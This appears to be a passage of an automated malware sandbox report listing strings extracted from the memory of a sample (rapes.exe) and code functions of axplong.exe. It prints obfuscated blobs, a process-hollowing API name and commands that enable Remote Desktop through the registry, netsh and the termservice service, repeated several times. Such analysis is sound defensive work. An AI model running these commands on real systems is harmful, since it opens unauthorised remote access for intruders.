d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe String found in binary or memory: net start termservice
Source: rapes.exe, 00000008.00000002.1534580911.00000000002D1000.00000040.00000001.01000000.0000000B.sdmp String found in binary or memory: net start termservice
Source: rapes.exe, 00000008.00000002.1534580911.00000000002D1000.00000040.00000001.01000000.0000000B.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe, 00000008.00000003.1493744531.0000000004A90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: rapes.exe, 00000008.00000003.1493744531.0000000004A90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe, 0000000B.00000003.1830573894.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: rapes.exe, 0000000B.00000003.1830573894.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe, 0000000B.00000002.2559503167.00000000002D1000.00000040.00000001.01000000.0000000B.sdmp String found in binary or memory: net start termservice
Source: rapes.exe, 0000000B.00000002.2559503167.00000000002D1000.00000040.00000001.01000000.0000000B.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 2_2_006AEB78 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo, 2_2_006AEB78
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 2_2_006ADE81 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext, 2_2_006ADE81